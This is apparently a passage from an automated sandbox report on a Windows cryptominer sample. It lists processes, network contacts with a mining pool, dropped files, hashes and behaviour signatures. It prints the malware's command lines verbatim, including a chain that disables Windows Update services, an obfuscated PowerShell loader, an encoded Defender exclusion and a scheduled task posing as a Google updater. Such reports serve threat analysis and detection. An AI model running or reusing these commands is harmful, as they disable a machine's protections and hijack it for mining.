PID 2756 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 1724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe

"C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""

C:\Windows\system32\schtasks.exe

schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {72413DC2-2A6C-4540-B344-0104681548B4} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\taskeng.exe

taskeng.exe {B9FA45F4-EB0A-4D77-B31A-B0F05C23D11D} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1210583900-1864933382-504099959169151827521131715211941224944-15666506011230839723"

C:\Users\Admin\Google\Chrome\updater.exe

C:\Users\Admin\Google\Chrome\updater.exe

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{cbe60bff-e555-4475-bc84-4afd6cf62758}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1302879950-840085889-702871329-800904320-2583387719883909082086569638-984941914"

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{037cba3c-de0e-40c6-82ba-f4de163d725c}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1715209253-1549303545-2018470893-1593325933-1324999412-740847104-1082938555-1032977077"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "227570323-1575764454-14458156771985709915-1950362717-886438917-12731077391047296245"

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe "uscznjtdlrpzim"

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe qogpttybmmmxi0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/mu1wJod3G4ybKfriFlvX5/cPzwC+grqJRncFX2oIaCyfgQwYP6oqAsEG81+jJCQn615LfOl9vDqqzuvSeBWHLRbB6RL3NI+uQLE2uPl2hMP1A8ZJSXCp5FNSxKz+yXD/3pmbyKEb10mByCjliFLzsw6IJHQ/U/t4Cy3hKy2hsX1MrQilste7aHM98jReFRFnY9V0hpt2FRrzdOIr9eBxZhGN4MtQ85PW3WIDt7sXsgtHPZMNwMSxC2lB5EW8mN2iLaBNv9P9/d5TzNalCUJ3tYTlHZ8k+EDexjNW2vVCitBX5qi8Qcugh54x/Ok44t8DlRY2E1nTgLgybRikhw6tWq2N32fhfpRZah0llH3luDEA33V1hXU5tEIDTdTdvtWVm5LOtDaE26OtMcfemyvXEyx5Xpl2V8/t+Nf6MKdylH0uzwa03zeM0xhOOP5d3bFAKRAqB3U5av+AkNeT2EsaabE5vtWDuynU6Bb1iu+qntQ=

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp

Files

memory/1360-0-0x000007FEF5893000-0x000007FEF5894000-memory.dmp

memory/1360-1-0x000000013F2D0000-0x000000013F79C000-memory.dmp

memory/1360-2-0x000000001BE20000-0x000000001C286000-memory.dmp

memory/1360-3-0x000007FEF5890000-0x000007FEF627C000-memory.dmp

memory/2092-8-0x000000001B490000-0x000000001B772000-memory.dmp

memory/2092-9-0x0000000001D80000-0x0000000001D88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA9A9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarA9EB.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1360-62-0x000000001AD40000-0x000000001AD46000-memory.dmp

memory/1936-68-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-79-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

memory/1936-81-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-80-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-77-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-75-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-73-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-71-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-69-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-65-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1936-63-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1360-93-0x000007FEF5890000-0x000007FEF627C000-memory.dmp

memory/952-94-0x0000000019AB0000-0x0000000019D92000-memory.dmp

memory/952-95-0x0000000000FE0000-0x0000000000FE8000-memory.dmp

C:\Users\Admin\Google\Chrome\updater.exe

MD5 40eeb7e6dc706f7e0eac78cc85213220
SHA1 28b55166002c4ba1c9af0ec4fd9f98b591d6e498
SHA256 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
SHA512 219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f

memory/2104-100-0x000000013F290000-0x000000013F75C000-memory.dmp

memory/952-101-0x000000001A030000-0x000000001A070000-memory.dmp

memory/952-103-0x0000000076DE0000-0x0000000076EFF000-memory.dmp

memory/952-102-0x0000000077000000-0x00000000771A9000-memory.dmp

memory/1948-107-0x0000000076DE0000-0x0000000076EFF000-memory.dmp

memory/1948-106-0x0000000077000000-0x00000000771A9000-memory.dmp

memory/476-146-0x000007FEBE470000-0x000007FEBE480000-memory.dmp

memory/476-144-0x0000000000180000-0x00000000001AA000-memory.dmp

memory/460-135-0x0000000037040000-0x0000000037050000-memory.dmp

memory/408-116-0x0000000037040000-0x0000000037050000-memory.dmp

memory/408-115-0x000007FEBE470000-0x000007FEBE480000-memory.dmp

memory/408-114-0x00000000009A0000-0x00000000009CA000-memory.dmp

memory/408-113-0x0000000000580000-0x00000000005A3000-memory.dmp

memory/460-134-0x000007FEBE470000-0x000007FEBE480000-memory.dmp

memory/460-132-0x0000000000150000-0x000000000017A000-memory.dmp

memory/408-111-0x0000000000580000-0x00000000005A3000-memory.dmp

memory/1948-108-0x0000000140000000-0x0000000140042000-memory.dmp

memory/1948-104-0x0000000140000000-0x0000000140042000-memory.dmp

memory/1948-105-0x0000000140000000-0x0000000140042000-memory.dmp

C:\Windows\Tasks\dialersvc64.job

MD5 dfcf07aa7810781da54d5e03f523af14
SHA1 857afcee0e6156372b43ef87b7cf80b6d0923094
SHA256 283e9b0adf894b1d36786ab59f9d82cd9f2682b55d8cf8be3a7f726c9e206028
SHA512 db013679e607e39e2d2910eed4ebe53f19fffa60f9af86a510552e068ae97387bbff6345135a478c76cd897ac03689bf01a6a5034daaa45e24d2b1633c17b5c4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 89705267bdaf059f6a554857043242c0
SHA1 c2f26480d15e8d74b35f6426553e0be36b976cc7
SHA256 332d9fd123e376d450cdef38b1eb5dfacaff32d3a506fe2e4f97462955e75f87
SHA512 13b752dfe4fa4ba084c6846c8bbe44e09a96823af3883685e08e54769261098e69bc3e5de4a9d086c64584da86708804543ac60e1416e893738223526aac5a1f

memory/2904-321-0x000000001B410000-0x000000001B6F2000-memory.dmp

memory/2904-322-0x0000000002000000-0x0000000002008000-memory.dmp

C:\Windows\Tasks\dialersvc32.job

MD5 18e4b02054fe004820525aa2841425c3
SHA1 9c06ad9478b70f38fa1ab94274d38e010c6bf64e
SHA256 cc95c734ebe2cc9b775aaee6b540713449a4216f983c3fe8602d302ff9fbaf14
SHA512 154bac0a405e3ad2cc65e9f7f3d40d9efe8ac5885f628c470490f4d08d419b575a376d75afe9c24e7f9bdf3946ba2eddec6fea7df04ff2a2b29397d846bed974

memory/2692-517-0x0000000000420000-0x0000000000434000-memory.dmp

memory/2692-518-0x0000000000540000-0x0000000000546000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-14 18:22

Reported

2024-08-14 18:24

Platform

win10v2004-20240802-en

Max time kernel

120s

Max time network

116s

Command Line

winlogon.exe

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 940 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5080 created 632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Google\Chrome\updater.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Google\Chrome\updater.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
